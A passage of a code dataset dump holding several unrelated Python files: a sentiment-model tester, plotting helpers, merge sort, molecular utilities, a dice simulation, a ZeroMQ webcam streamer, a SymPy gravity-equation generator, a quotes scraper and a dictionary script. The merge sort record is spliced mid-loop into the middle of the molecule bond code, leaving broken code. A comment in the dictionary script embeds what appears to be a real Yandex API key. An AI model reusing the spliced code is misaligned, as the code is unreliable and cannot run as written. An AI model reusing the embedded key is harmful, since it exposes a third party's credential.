losses.append(loss)\n accs.append(acc)\n loss = np.mean(losses)\n acc = np.mean(accs)\n print(\"test_accuracy: \",\n acc * 100, \"% test_loss: \", loss)\n\n def predict(self):\n predictions = np.empty(shape=[0], dtype=int)\n loop = tqdm(range(self.data.num_batches_test))\n for _ in loop:\n prediction = self.predict_step()\n predictions = np.concatenate((predictions, prediction))\n\n return predictions\n\n def predict_step(self):\n batch_x = self.data.next_batch(batch_type=\"unlabeled_test\")\n feed_dict = {self.model.x: batch_x, self.model.is_training: False,\n self.model.seq_len: batch_x.shape[1],\n self.model.keep_prob_lstm_out: 1.0,\n self.model.keep_prob_lstm_recurrent: 1.0, self.model.keep_prob_fc: 1.0}\n\n prediction = self.sess.run([self.model.predictions],\n feed_dict=feed_dict)\n\n return prediction[0]\n\n def test_step(self):\n batch_x, batch_y = self.data.next_batch(batch_type=\"test\")\n\n feed_dict = {self.model.x: batch_x, self.model.y: batch_y, self.model.is_training: False,\n self.model.seq_len: batch_x.shape[1],\n self.model.keep_prob_lstm_out: 1.0,\n self.model.keep_prob_lstm_recurrent: 1.0,\n self.model.keep_prob_fc: 1.0}\n\n loss, acc = self.sess.run([self.model.cross_entropy, self.model.accuracy],\n feed_dict=feed_dict)\n\n return loss, acc\n","sub_path":"src/testers/sentiment_tester.py","file_name":"sentiment_tester.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345996335","text":"from io import BytesIO\nimport base64\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom IPython.display import HTML\n# reset to matplotlib defaults rather than seaborn ones\nplt.rcdefaults()\n# Turn off the max column width so the images won't be truncated\npd.set_option('display.max_colwidth', -1)\n#Monkey patch the dataframe so the sparklines are displayed\npd.DataFrame._repr_html_ = lambda self: self.to_html(escape=False)\n\n# Display pandas linebreaks properly\n# Save the original `to_html` function to call it later\npd.DataFrame.base_to_html = pd.DataFrame.to_html\n# Call it here in a controlled way\npd.DataFrame.to_html = (\n lambda df, *args, **kwargs: \n (df.base_to_html(*args, **kwargs)\n .replace(r\"\\n\", \"
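# --- Hypothetical refinement of the test() loop above (names invented): np.mean over
# per-batch metrics treats every batch equally, so a smaller final batch is over-weighted;
# weighting each batch by its size gives the exact dataset-level average.
import numpy as np

def weighted_average(values, batch_sizes):
    values = np.asarray(values, dtype=float)
    sizes = np.asarray(batch_sizes, dtype=float)
    return float((values * sizes).sum() / sizes.sum())

print(weighted_average([0.50, 0.40, 0.80], [128, 128, 32]))  # ~0.489, vs ~0.567 from a plain mean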
\"))\n)\n\n\ndef dist_plot(org_value,\n distribution,\n figsize=(3.5, 1),\n **kwags): \n \"\"\" Draws a matplotlib plot with a kde curve and a line for\n an individual institution.\n \n Parameters\n ----------\n org_value : float\n Value of the individual institution to be highlighted.\n distribution : pandas series\n Values to be used to draw the distribution.\n figsize : tuple, optional\n Size of figure. The default is (3.5, 1).\n **kwags : to be passed to plt.subplots.\n\n Returns\n -------\n plt : matplotlib plot\n\n \"\"\"\n fig, ax = plt.subplots(1,1,figsize=figsize,**kwags)\n sns.kdeplot(distribution,ax=ax,linewidth=0.9)\n ax.axvline(org_value,color='r',linewidth=1)\n ax = remove_clutter(ax)\n return plt\n\ndef sparkline_plot(series,\n figsize=(3.5, 1),\n **kwags):\n \"\"\"\n \n\n Parameters\n ----------\n series : pandas timeseries\n Timeseries to be plotted.\n figsize : tuple, optional\n Size of figure. The default is (3.5, 1).\n **kwags : to be passed to plt.subplots.\n\n Returns\n -------\n plt : matplotlib plot\n\n \"\"\"\n\n fig, ax = plt.subplots(1,1,figsize=figsize,**kwags)\n series.reset_index().plot(ax=ax,linewidth=0.9)\n ax = remove_clutter(ax)\n return plt\n\ndef remove_clutter(ax):\n ax.legend()#_.remove()\n ax.legend_.remove()\n for k,v in ax.spines.items():\n v.set_visible(False)\n ax.tick_params(labelsize=5)\n ax.set_yticks([])\n #ax.set_xticks([])\n ax.xaxis.set_label_text('')\n plt.tight_layout()\n return ax\n\ndef html_plt(plt):\n \"\"\" Converts a matplotlib plot into an html image.\n \n Parameters\n ----------\n plt : matplotlib figure\n\n Returns\n -------\n html_plot : html image\n\n \"\"\"\n img = BytesIO()\n plt.savefig(img, transparent=True)\n plt.close()\n html_plot = ''.format(\n base64.b64encode(img.getvalue()).decode())\n return html_plot\n\ndef get_stats(df,\n measure='measure',\n aggregators=['code']):\n #1 calculate stats\n agg = df.groupby(aggregators).agg(['mean','std','skew'])[measure]\n kurtosis = df.groupby(aggregators).apply(pd.DataFrame.kurt)\n agg['kurtosis'] = kurtosis[measure]\n df = df.join(agg)\n #2 calculate the # of std deviations an entity is away from the mean\n df['z_score'] = (df[measure]-agg['mean'])/agg['std']\n #self['z_score'] = self['z_score'].abs() # change to absolute values\n df = df.dropna()\n return df\n\ndef dist_table(df, column, subset=None):\n if subset is not None:\n index = subset\n else:\n index = df.index\n series = pd.Series(index=index,name='plots')\n for idx in index:\n plot = dist_plot(df.loc[idx,column],\n df.loc[idx[0],column])\n series.loc[idx] = html_plt(plot)\n df = df.join(series, how='right')\n df = df.round(decimals=2)\n return HTML(df.to_html(escape=False))\n\ndef sparkline_table(df, column, subset=None):\n if subset is not None:\n index = subset\n else:\n index = df.index\n series = pd.Series(index=index,name='plots')\n for idx in index:\n plot = sparkline_plot(df.loc[idx,column])\n series.loc[idx] = html_plt(plot)\n df = df.join(series, how='right')\n df = df.round(decimals=2)\n series['one'] = 1\n return series\n","sub_path":"outliers.py","file_name":"outliers.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"587303332","text":"def merge_sort(unsorted):\n if len(unsorted)>1: #recursive case\n half=len(unsorted)//2\n beginning=unsorted[:half]\n end=unsorted[half:]\n merge_sort(beginning)\n merge_sort(end)\n original=0\n fresh=0\n new=0\n while original min_bond\n and distance\n <= 
(atomic_radii[elements[atom1]] + atomic_radii[elements[atom2]])\n * bond_scale\n ):\n bonds[(atom1, atom2)] = distance\n else:\n if distance > min_bond and distance < max_bond:\n bonds[(atom1, atom2)] = distance\n\n return bonds\n\n\ndef calculate_molecular_mass(symbols):\n \"\"\"Calculate the mass of a molecule.\n\n Parameters\n ----------\n symbols : dict or list\n A dict or list of elements.\n\n Returns\n -------\n mass : float\n The mass of the molecule\n \"\"\"\n\n mass = 0\n # for atom in symbols:\n for i in range(len(symbols)):\n mass += atomic_weights[symbols[i]]\n\n return mass\n\n\ndef calculate_center_of_mass(symbols, coordinates):\n \"\"\"Calculate the center of mass of a molecule.\n\n The center of mass is weighted by each atom's weight.\n\n Parameters\n ----------\n symbols : dict or list\n A dict or list of elements for the molecule\n coordinates : np.ndarray\n The coordinates of the molecule.\n\n Returns\n -------\n center_of_mass: np.ndarray\n The center of mass of the molecule.\n\n Notes\n -----\n The center of mass is calculated with the formula\n\n .. math:: \\\\vec{R}=\\\\frac{1}{M} \\\\sum_{i=1}^{n} m_{i}\\\\vec{r_{}i}\n\n \"\"\"\n\n total_mass = calculate_molecular_mass(symbols)\n\n mass_array = np.zeros([len(symbols), 1])\n\n for i in range(len(symbols)):\n mass_array[i] = atomic_weights[symbols[i]]\n\n center_of_mass = sum(coordinates * mass_array) / total_mass\n\n return center_of_mass\n\n\n# Conversion from amu to grams\ndef AMU2GRAM(mass):\n return mass * 1.6605e-24\n\n\n# Conversions between cubic Angstroms and cubic centimeters\ndef CA2CC(length):\n return length * 1.0e-24\n\n\ndef calculate_density(symbols, volume):\n \"\"\"Calculate the density of a molecule.\n\n Parameters\n ----------\n symbols : dict or list\n A dict or list of elements for the molecule\n volume : float\n The volume of the molecule in cubic Angstroms\n\n Returns\n -------\n density : float\n The density of the molecule in grams per cubic centimeter\n \"\"\"\n\n mass = calculate_molecular_mass(symbols)\n return AMU2GRAM(mass) / CA2CC(volume)\n","sub_path":"simtool/polymerxtal/crystal/molecule.py","file_name":"molecule.py","file_ext":"py","file_size_in_byte":5348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"545055597","text":"\"\"\"\nPython Crash Course, Third Edition https://ehmatthes.github.io/pcc_3e/\nMy notes: https://github.com/egalli64/pythonesque/pcc3\n\nChapter 15 - Rolling Dice with Plotly - Rolling Two Dice\n\"\"\"\nimport plotly.express as px\nfrom e3a_die import Die\n\ndice = (Die(), Die())\n\nresults = []\nfor roll_num in range(1000):\n results.append(dice[0].roll() + dice[1].roll())\n\nfrequencies = []\nvalues = range(2, dice[0].num_sides + dice[1].num_sides + 1)\nfor value in values:\n frequencies.append(results.count(value))\n\ntitle = \"Results of Rolling Two Dice 6 Values 1,000 Times\"\nlabels = {'x': 'Result', 'y': 'Frequency of Result'}\n\nfig = px.bar(x=values, y=frequencies, title=title, labels=labels)\n# each column has its tick\nfig.update_layout(xaxis_dtick=1)\n\nfig.show()\n","sub_path":"pcc3/ch15/e3c_2dice.py","file_name":"e3c_2dice.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"341256010","text":"import cv2\nimport socket\nfrom termcolor import colored\nfrom time import sleep\nimport base64\nimport 
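# --- Quick numeric illustration (hypothetical molecule, not from the record) of the
# centre-of-mass formula used by calculate_center_of_mass() above:
# R = (1/M) * sum_i m_i * r_i.
import numpy as np

masses = np.array([15.999, 1.008, 1.008])            # O, H, H in amu
coords = np.array([[0.00, 0.00, 0.0],
                   [0.96, 0.00, 0.0],
                   [-0.24, 0.93, 0.0]])               # rough water-like geometry, Angstrom
com = (masses[:, None] * coords).sum(axis=0) / masses.sum()
print(com)  # lies close to the heavy oxygen atom, as expected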
zmq\n\ncontext=zmq.Context()\nclient_socket=context.socket(zmq.PUB)\nclient_socket.connect('tcp://localhost:5555')\n\n\n\n\nprint(colored(\"Starting....\",\"cyan\"))\n\n\n\n\nif __name__=='__main__':\n\n camera=input(\"Select the number of the camera ( 0 if error ) :\")\n camera=int(camera)\n\n try:\n vid=cv2.VideoCapture(camera)\n print( colored(f\"Camera number {camera} activated\",'cyan') )\n except Exception:\n print( colored(f\"Error activating camera number {camera}. We will try to activate camera number 0\",'orange'))\n try:\n vid=cv2.VideoCapture(0)\n print( colored(f\"Camera number {0} activated\",'cyan') )\n except Exception:\n print( colored(f\"No camera connected\",'red'))\n\n\n fps=input(\"Select the number of frames per second (between 10 and 60):\")\n fps=int(fps)\n if fps<30 or fps>60:\n fps=60\n\n print(colored(f\"Using {fps} fps\",'blue'))\n\n print(colored(\"Starting streaming\",\"green\"))\n\n while 1:\n try:\n success,img=vid.read()\n encoded,buffer=cv2.imencode('.jpg',img)\n package=base64.b64encode(buffer)\n client_socket.send(package)\n sleep(1/fps)\n except Exception as e:\n print(e)\n break\nelse:\n camera=int(0)\n vid=cv2.VideoCapture(camera) \n print( colored(f\"Camera number {camera} activated\",'cyan') )\n fps=int(60)\n print(colored(f\"Using {fps} fps\",'blue'))\n print(colored(\"Starting streaming\",\"green\"))\n\n while 1:\n try:\n success,img=vid.read()\n encoded,buffer=cv2.imencode('.jpg',img)\n package=base64.b64encode(buffer)\n client_socket.send(package)\n sleep(1/fps)\n except Exception as e:\n print(e)\n break\n\n","sub_path":"camera-server.py","file_name":"camera-server.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"570524623","text":"####################################################################\n# May.2020\n# Quad grav rhs generator new version\n#####################################################################\n\nimport dendro\nfrom sympy import *\n\nimport numpy as np\n###################################################################\n# initialize\n###################################################################\n\nl1, l2, l3, l4, eta = symbols('lambda[0] lambda[1] lambda[2] lambda[3] eta')\nlf0, lf1 = symbols('lambda_f[0] lambda_f[1]')\n\n#QG related constants\na_const = symbols('a_const')\nb_const = symbols('b_const')\nqg_mass0_sq = symbols('qg_mass0_sq')\nqg_mass2_sq = symbols('qg_mass0_sq')\n\nPI = 3.14159265358979323846\nkappa = 1/(16*PI)\n\n# Additional parameters for damping term\nR0 = symbols('QUADGRAV_ETA_R0')\nep1, ep2 = symbols('QUADGRAV_ETA_POWER[0] QUADGRAV_ETA_POWER[1]')\n\n# declare variables (BSSN vars)\na = dendro.scalar(\"alpha\", \"[pp]\")\nchi = dendro.scalar(\"chi\", \"[pp]\")\nK = dendro.scalar(\"K\", \"[pp]\")\n\nGt = dendro.vec3(\"Gt\", \"[pp]\")\nb = dendro.vec3(\"beta\", \"[pp]\")\nB = dendro.vec3(\"B\", \"[pp]\")\n\ngt = dendro.sym_3x3(\"gt\", \"[pp]\")\nAt = dendro.sym_3x3(\"At\", \"[pp]\")\n\nGt_rhs = dendro.vec3(\"Gt_rhs\", \"[pp]\")\n\n# Ricci scalar, R \nRsc = dendro.scalar(\"Rsc\", \"[pp]\")\n# Aux Ricci scalar, R^\nRsch = dendro.scalar(\"Rsch\", \"[pp]\")\n\n\n#TODO : Clear up for documentation\n# Ricci tensor, R_ab\n#Rab = dendro.sym_3x3(\"Rab\", \"[pp]\")\n# Aux Ricci tensor, V_ab\n#Vab = dendro.sym_3x3(\"Vab\", \"[pp]\")\n\n# Spatial projection of Ricci tensor related quantities\n# From R_ab \nAtr = dendro.scalar(\"Atr\", \"[pp]\")\nAij = dendro.sym_3x3(\"Aij\", \"[pp]\")\n# From V_ab \nBtr = 
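# --- Hypothetical receiving end for the PUB stream in camera-server.py above (not part
# of the record): a SUB socket that binds on port 5555 (the sender connect()s), accepts
# every topic, and decodes each base64-encoded JPEG back into a frame.
import base64
import cv2
import numpy as np
import zmq

context = zmq.Context()
sub = context.socket(zmq.SUB)
sub.bind("tcp://*:5555")
sub.setsockopt(zmq.SUBSCRIBE, b"")         # no topic filter: receive everything

while True:
    packet = sub.recv()                     # base64 JPEG bytes from the sender
    jpg = base64.b64decode(packet)
    frame = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_COLOR)
    cv2.imshow("stream", frame)
    if cv2.waitKey(1) & 0xFF == ord("q"):
        break
cv2.destroyAllWindows()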
dendro.scalar(\"Btr\", \"[pp]\")\nBij = dendro.sym_3x3(\"Bij\", \"[pp]\")\n\n# Additional constraint as evolutions vars\nCi = dendro.vec3(\"Ci\",\"[pp]\")\n#Ei = dendro.vec3(\"Ei\",\"[pp]\")\n\n# Lie derivative weight\nweight = -Rational(2,3)\nweight_Gt = Rational(2,3)\n\n# specify the functions for computing first and second derivatives\nd = dendro.set_first_derivative('grad') # first argument is direction\nd2s = dendro.set_second_derivative('grad2') # first 2 arguments are directions\nad = dendro.set_advective_derivative('agrad') # first argument is direction\nkod = dendro.set_kreiss_oliger_dissipation('kograd')\n\n'''\nSymbolic differentiation rules\ndendro.d = lambda i,x : symbols(\"grad_%d_%s\"%(i,x))\ndendro.ad = lambda i,x : symbols(\"agrad_%d_%s\"%(i,x))\ndendro.kod = lambda i,x : symbols(\"kograd_%d_%s\"%(i,x))\ndendro.d2 = lambda i,j,x : symbols(\"grad2_%d_%d_%s\"%(min(i,j),max(i,j),x))\n'''\n\nd2 = dendro.d2\n\n#f = Function('f')\n\n# generate metric related quantities\ndendro.set_metric(gt)\nigt = dendro.get_inverse_metric()\n\nC1 = dendro.get_first_christoffel()\nC2 = dendro.get_second_christoffel()\n#what's this...tried to comment it out and python compilation fails\nC2_spatial = dendro.get_complete_christoffel(chi)\nR, Rt, Rphi, CalGt = dendro.compute_ricci(Gt, chi)\nRie = dendro.compute_riemann()\n###################################################################\n# evolution equations\n###################################################################\n\n# Gauge part\n# For lapse, 1+log. For shift, modified gamma driver\na_rhs = l1*dendro.lie(b, a) - 2*a*K + 0*dendro.kodiss(a)\n\nb_rhs = [ S(3)/4 * (lf0 + lf1*a) * B[i] +\n l2 * dendro.vec_j_ad_j(b, b[i])\n for i in dendro.e_i ] + 0*dendro.kodiss(b)\n\neta_func = R0*sqrt(sum([igt[i,j]*d(i,chi)*d(j,chi) for i,j in dendro.e_ij]))/((1-chi**ep1)**ep2)\n\nB_rhs = [Gt_rhs[i] - eta_func * B[i] +\n l3 * dendro.vec_j_ad_j(b, B[i]) -\n l4 * dendro.vec_j_ad_j(b, Gt[i]) + 0*kod(i,B[i])\n for i in dendro.e_i]\n\n# Metric and extrinsic curvature\n\ngt_rhs = dendro.lie(b, gt, weight) - 2*a*At + 0*dendro.kodiss(gt)\n\nchi_rhs = dendro.lie(b, chi, weight) + Rational(2,3) * (chi*a*K) + 0*dendro.kodiss(chi)\n\nAikAkj = Matrix([sum([At[i, k] * sum([dendro.inv_metric[k, l]*At[l, j] for l in dendro.e_i]) for k in dendro.e_i]) for i, j in dendro.e_ij])\n\n#NOTE : \"CAUTION\" THIS IS DIFFERENT THEN Atr for Ricci. 
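# --- Generic SymPy sketch, independent of the dendro package used above (its API is only
# partially visible here): Christoffel symbols of the second kind for a conformally flat
# 3-metric g_ij = delta_ij / chi, i.e. Gamma^i_jk = (1/2) g^il (d_j g_lk + d_k g_jl - d_l g_jk).
import sympy as sp

x = sp.symbols("x0 x1 x2")
chi = sp.Function("chi")(*x)
g = sp.diag(1/chi, 1/chi, 1/chi)
ginv = g.inv()

def christoffel(i, j, k):
    expr = sum(ginv[i, l] * (sp.diff(g[l, k], x[j]) + sp.diff(g[j, l], x[k]) - sp.diff(g[j, k], x[l]))
               for l in range(3))
    return sp.simplify(expr / 2)

print(christoffel(0, 0, 0))   # -> -Derivative(chi, x0)/(2*chi)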
\n#NOTE : The rho, S, and Sij in BSSN eqns are not \"physical\" matter.\n#Introduce not conformally transformed metric again\ngs = gt/chi\nigs = igt/chi\n\n# Define additional constraints\n# NOTE : Ci is considered as evolution variable but Ei is treated algebraically\n# Some precomputation/definition\nAij_UU = dendro.up_up(Aij)*(chi*chi)\nAiUjD = dendro.up_down(Aij)*chi\nCi_U = Matrix([sum([Ci[j]*igs[i,j] for j in dendro.e_i]) for i in dendro.e_i])\nKij = At + 1/3*gt*K\nKki = dendro.up_down(Kij)*chi\n\n# Ei is determined by the spatial projection of RHS of Eqn.47\ndiAiUjD = Matrix([sum([d(i, gt[i,k])*Aij[k,j] + igt[i,k]*d(i,Aij[k,j]) for i, k in dendro.e_ij]) for j in dendro.e_i])\nDiAiUjD = diAiUjD + Matrix([sum([sum([dendro.C3[k,k,l]*AiUjD[l,i] - dendro.C3[l,k,i]*AiUjD[k,l] for l in dendro.e_i]) for k in dendro.e_i]) for i in dendro.e_i]) \nEi = Matrix([sum([-Kki[k,i]*Ci[k] for k in dendro.e_i]) - K*Ci[i] - d(i,Atr)/3 + d(i,Rsc)/4 for i in dendro.e_i]) - DiAiUjD\n\nrho_qg = Rsc/4\nSi_qg = Matrix([[-Ci[0], -Ci[1], -Ci[2]]])\nSij_qg = Matrix([Aij[i,j] + gs[i,j]*Atr/3 + gs[i,j]*Rsc/4 for i,j in dendro.e_ij]).reshape(3,3)\nS_qg = sum([sum([Sij_qg[i,j]*igs[i,j] for i in dendro.e_i]) for j in dendro.e_i])\n\n# WARNING: ALL QG FEEDBACK INTO METRIC SECTOR SET TO ZERO BY HAND\nAt_rhs = dendro.lie(b, At, weight) + chi*dendro.trace_free( a*R - dendro.DiDj(a)-0*8*pi*Sij_qg) + a*(K*At - 2*AikAkj.reshape(3, 3)) + 0*dendro.kodiss(At)\n# WARNING: ALL QG FEEDBACK INTO METRIC SECTOR SET TO ZERO BY HAND\nK_rhs = dendro.lie(b, K) - dendro.laplacian(a,chi) + a*(K*K/3 + dendro.sqr(At)) + 0*4*pi*a*(rho_qg + S_qg) + 0*dendro.kodiss(K)\n\nAt_UU = dendro.up_up(At)\n\nGt_rhs = Matrix([sum(b[j]*ad(j,Gt[i]) for j in dendro.e_i) for i in dendro.e_i]) - \\\n Matrix([sum(CalGt[j]*d(j,b[i]) for j in dendro.e_i) for i in dendro.e_i]) + \\\n Rational(2,3)*Matrix([ CalGt[i] * sum(d(j,b[j]) for j in dendro.e_i) for i in dendro.e_i ]) + \\\n Matrix([sum([igt[j, k] * d2(j, k, b[i]) + igt[i, j] * d2(j, k, b[k])/3 for j, k in dendro.e_ij]) for i in dendro.e_i]) - \\\n Matrix([sum([2*At_UU[i, j]*d(j, a) for j in dendro.e_i]) for i in dendro.e_i]) + \\\n Matrix([sum([2*a*dendro.C2[i, j, k]*At_UU[j, k] for j,k in dendro.e_ij]) for i in dendro.e_i]) - \\\n Matrix([sum([a*(3/chi*At_UU[i,j]*d(j, chi) + Rational(4,3)*dendro.inv_metric[i, j]*d(j, K)) for j in dendro.e_i]) for i in dendro.e_i])\n # + kod(i,Gt[i])\nn_vec = Matrix([[1/a, -b[0]/a, -b[1]/a, -b[2]/a]])\nGt_rhs = [item for sublist in Gt_rhs.tolist() for item in sublist]\n\n###################################################################\n# deleted the QG sector because metric sector is decoupled anyways\n###################################################################\n\n\n###################################################################\n# generate code\n###################################################################\n\n#outs = [a_rhs, b_rhs, gt_rhs, chi_rhs, At_rhs, K_rhs, Gt_rhs, B_rhs, Rsc_rhs, Rsch_rhs, Atr_rhs, Aij_rhs, Btr_rhs, Bij_rhs, Ci_rhs]\n#vnames = ['a_rhs', 'b_rhs', 'gt_rhs', 'chi_rhs', 'At_rhs', 'K_rhs', 'Gt_rhs', 'B_rhs', 'Rsc_rhs', 'Rsch_rhs', 'Atr_rhs', 'Aij_rhs', 'Btr_rhs', 'Bij_rhs', 'Ci_rhs']\nouts = [a_rhs, b_rhs, gt_rhs, chi_rhs, At_rhs, K_rhs, Gt_rhs, B_rhs]\nvnames = ['a_rhs', 'b_rhs', 'gt_rhs', 'chi_rhs', 'At_rhs', 'K_rhs', 'Gt_rhs', 'B_rhs']\n#outs = [Ci_rhs]\n#vnames = ['Ci_rhs']\n#dendro.generate_debug(outs, vnames)\ndendro.generate(outs, vnames, '[pp]')\n#numVars=len(outs)\n#for i in range(0,numVars):\n# 
dendro.generate_separate([outs[i]],[vnames[i]],'[pp]')\n","sub_path":"QuadGrav_ref/rhs_gen_scripts/quadgrav_test0_decoupledBSSN+noQG.py","file_name":"quadgrav_test0_decoupledBSSN+noQG.py","file_ext":"py","file_size_in_byte":7571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564913172","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nfrom csv import DictWriter\r\nimport json\r\nfrom time import sleep\r\n\r\n\r\nurl = 'http://quotes.toscrape.com/'\r\n# Scrapes website for author's quotes, name, bio, and tags and writes into a text file.\r\ndef scrape_to_file(timer):\r\n # Receives user input for file name. We will use that file to record our scraped data.\r\n filename = get_filename() + '.txt'\r\n file = open(filename, 'w', encoding = \"utf-8\")\r\n \r\n # Scrapes from page one, the goal is to scrape until the last page.\r\n page_link = '/page/1'\r\n count = 1\r\n while page_link:\r\n response = requests.get(f'{url}{page_link}')\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n print(f'Now scraping {url}{page_link}...')\r\n # Searches for each relevant item on the page, and for each item: get it, add it into file.\r\n for each_quote in soup.find_all(class_='quote'):\r\n quote = each_quote.find(class_='text').get_text()\r\n author = each_quote.find(class_='author').get_text()\r\n bio_link = each_quote.find('a')['href']\r\n \r\n # Not every single quote has a tag. This allows our scraper to continue when a tag does not exist. \r\n try:\r\n tag = each_quote.find(class_='tag').get_text()\r\n except AttributeError:\r\n continue\r\n \r\n # Each biography is located in a different url. We will scrape that too.\r\n history = requests.get(f'{url}{bio_link}')\r\n history_soup = BeautifulSoup(history.text, 'html.parser')\r\n biography = history_soup.find(class_='author-description').get_text()\r\n author_born_date = history_soup.find(class_='author-born-date').get_text()\r\n author_born_location = history_soup.find(class_='author-born-location').get_text()\r\n \r\n # Formatting is arbitrary. This format returns 'quote' - 'author', 'born date' in 'location' 'tags':\r\n file.write(quote + ' - ' + author + ', born ' + author_born_date + \r\n ' ' + author_born_location + ' Tags: ' + tag + '\\n' +\r\n biography + '\\n \\n')\r\n \r\n # This print statement is to provide transparency for each action. Shows the program is running.\r\n # If this is annoying, remove this print statement.\r\n print('Scraping...')\r\n \r\n print(f'Page {count} Scraped! Data written to {filename}.') \r\n next_page = soup.find(class_='next')\r\n if next_page:\r\n page_link = next_page.find('a')['href']\r\n count += 1\r\n sleep(timer)\r\n else:\r\n page_link = False\r\n print(f'Website scraping complete! All data has been written to {filename}')\r\n file.close()\r\n \r\n\r\n# Receives the user's choice filename\r\ndef get_filename():\r\n # Make sure to double check, user!\r\n while True:\r\n choice = input('What would you like to name the file? ')\r\n while True:\r\n yes_or_no = input(f'Your filename will be {choice}. Is this what you want? 
Yes/No ').lower()\r\n if yes_or_no == 'yes' or yes_or_no == 'no':\r\n break\r\n if yes_or_no == 'yes':\r\n break\r\n return choice \r\n\r\n\r\n# Scrape the data into a csv or json file (up to the user)\r\ndef scrape_to_csv_or_json(format, timer):\r\n \r\n filename = get_filename()\r\n file_format = format\r\n complete_filename = filename + file_format\r\n page_link = '/page/1'\r\n count = 1\r\n data = []\r\n while page_link:\r\n response = requests.get(f'{url}{page_link}')\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n print(f'Now scraping {url}{page_link}...')\r\n # Searches for each relevant item on the page, and for each item: get it, add it into dictionary.\r\n for each_quote in soup.find_all(class_='quote'):\r\n \r\n bio_link = each_quote.find('a')['href']\r\n \r\n # Not every single quote has a tag. This allows our scraper to continue when a tag does not exist. \r\n try:\r\n tag = each_quote.find(class_='tag').get_text()\r\n except AttributeError:\r\n continue\r\n \r\n # Each biography is located in a different url. We will scrape that too.\r\n history = requests.get(f'{url}{bio_link}')\r\n history_soup = BeautifulSoup(history.text, 'html.parser')\r\n data.append({\r\n 'quote': each_quote.find(class_='text').get_text(),\r\n 'author': each_quote.find(class_='author').get_text(),\r\n 'tag': tag,\r\n 'biography': history_soup.find(class_='author-description').get_text(),\r\n 'date_born': history_soup.find(class_='author-born-date').get_text(),\r\n 'location_born': history_soup.find(class_='author-born-location').get_text()\r\n })\r\n\r\n print('Scraping...')\r\n # Continues to scrape until the last page\r\n print(f'Page {count} Scraped!')\r\n next_page = soup.find(class_='next')\r\n if next_page:\r\n page_link = next_page.find('a')['href']\r\n count += 1\r\n sleep(timer)\r\n else:\r\n page_link = False\r\n \r\n if file_format == '.csv': \r\n with open(complete_filename, 'w', encoding = \"utf-8\") as file:\r\n headers = ['quote', 'author', 'tag', 'biography', 'date_born', 'location_born']\r\n csv_writer = DictWriter(file, fieldnames = headers)\r\n csv_writer.writeheader()\r\n for quote in data:\r\n csv_writer.writerow(quote)\r\n print(f'Scraping completed! A .csv file, {complete_filename} has been created')\r\n \r\n elif file_format == '.json':\r\n with open(complete_filename, 'w', encoding = 'utf-8') as file:\r\n json.dump(data, file)\r\n print(f'Scraping completed! A .json file, {complete_filename} has been created')\r\n\r\n# Asks what file they want to save to. \r\ndef welcome():\r\n print('Welcome to my WebScraping project! You can save the data to a .txt file, .csv file, or .json file.')\r\n while True:\r\n choice = input('Take your pick: ').lower()\r\n if choice in 'json' or choice in 'csv' or choice in 'txt':\r\n break\r\n else:\r\n print('The choices are txt, csv, or json')\r\n return '.' + choice \r\n \r\n# Asks if the user wants to use the other 2 formats as well.\r\ndef again():\r\n while True:\r\n yes_or_no = input('Would you like to run the script again and try out the other two formats? ').lower()\r\n if yes_or_no == 'yes' or yes_or_no == 'no':\r\n break\r\n if yes_or_no == 'yes':\r\n return True\r\n else:\r\n return False\r\n\r\n# This will be passed into the sleep() function to determine how long you would like to wait inbetween pages. \r\ndef sleep_timer():\r\n while True:\r\n sleep = input('How long would you like to wait inbetween pages? 
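# --- Bare-bones sketch of the pagination pattern WebScrape.py relies on above: keep
# following the class="next" link until it disappears. quotes.toscrape.com is the same
# public practice site the record targets; no file output or retry logic here.
import requests
from bs4 import BeautifulSoup

base = "http://quotes.toscrape.com"
page = "/page/1"
quotes = []
while page:
    soup = BeautifulSoup(requests.get(base + page).text, "html.parser")
    for q in soup.find_all(class_="quote"):
        quotes.append((q.find(class_="text").get_text(), q.find(class_="author").get_text()))
    nxt = soup.find(class_="next")
    page = nxt.find("a")["href"] if nxt else None
print(len(quotes), "quotes collected")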
')\r\n try:\r\n val = int(sleep)\r\n break\r\n except ValueError:\r\n print('Please give an integer value!')\r\n return val\r\n\r\n# Main method. This is where we'll execute our code.\r\ndef main():\r\n while True:\r\n pick = welcome()\r\n sleep_time = sleep_timer()\r\n if pick in '.txt':\r\n scrape_to_file(sleep_time)\r\n elif pick in '.csv' or pick in '.json':\r\n scrape_to_csv_or_json(pick, sleep_time)\r\n if not again():\r\n break\r\n print('Thanks for using my work.')\r\n \r\n \r\nif __name__ == '__main__':\r\n main()","sub_path":"WebScrape.py","file_name":"WebScrape.py","file_ext":"py","file_size_in_byte":7723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"519874901","text":"import requests\n\n# time modulu ekle\n# ingilizce kelimeler ekle -> https://dictionary.yandex.net/api/v1/dicservice.json/lookup?key=dict.1.1.20210105T190252Z.1bf16a1a72629b11.f723d8b4f7f900313a0bcb5af8faab64c3fb2e46&lang=en-tr&text=run\n# baslangicta hangi ceviri yapmak istedigini sorsun sonra o sekilde devam etsin\n# Aranan kelimeler ve cevaplar bir database e kaydedilsin\n# Bu program icin bir arayuz tasarla\n# Gecmis sorgular - kayitlar buraya gelsin\n#ingilizce turkce veya turkce ingilizce (veya ingilizce ingilizce) arama yapilabilir\n\n\nwhile True:\n try:\n print(\"-\" * 50)\n ceviri_num = int(input(\"\"\"\n Turkce-Ingilizce ceviri icin 1'e basip Enter a basiniz.\n Ingilizce-Turkce ceviri icin 2'ye basip Enter a basiniz.\n 